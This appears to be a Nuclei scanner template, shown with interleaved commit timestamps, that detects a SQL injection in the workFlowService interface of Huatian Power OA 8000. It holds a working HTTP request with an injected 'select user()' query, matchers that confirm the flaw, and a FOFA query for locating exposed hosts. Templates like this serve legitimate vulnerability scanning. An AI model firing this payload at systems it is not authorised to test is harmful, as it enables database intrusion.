2023-09-01 15:30:09 +00:00
id : huatian-oa8000-sqli
2023-08-21 17:25:44 +00:00
info :
2023-09-01 15:30:09 +00:00
name : Huatian Power OA 8000 workFlowService - SQL injection
2023-08-21 17:25:44 +00:00
author : SleepingBag945
severity : critical
2023-09-01 15:30:09 +00:00
description : |
There is a SQL injection vulnerability in the workFlowService interface of Huatian Power OA 8000 version, through which an attacker can obtain sensitive database information
reference :
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
2023-08-21 17:25:44 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2023-08-21 17:25:44 +00:00
fofa-query : app="华天动力-OA8000"
2023-09-01 15:30:09 +00:00
tags : huatian,oa,sqli
2023-08-21 17:25:44 +00:00
http :
- raw :
- |
2023-09-01 15:30:09 +00:00
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
2023-08-21 17:25:44 +00:00
Host : {{Hostname}}
2023-09-01 15:33:37 +00:00
<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
2023-09-01 15:30:09 +00:00
</buffalo-call>
2023-08-21 17:25:44 +00:00
matchers :
- type : dsl
2023-08-21 17:28:53 +00:00
dsl :
2023-09-01 15:30:09 +00:00
- 'status_code == 200'
- 'contains(content_type, "text/xml")'
- 'contains_all(body,"<buffalo-reply>" ,"<string>user()")'
2023-08-21 17:25:44 +00:00
condition : and
2023-10-19 13:13:52 +00:00
# digest: 490a00463044022029aac5fade7e5ccc9ed7bbab043f503322977827be3df1da1f771b1b2eb3bd96022049fd0966ff030b78c854eefe2e3469c7a30c2079c8321887617fd994078f2f38:922c64590222798bb761d5b6d8e72950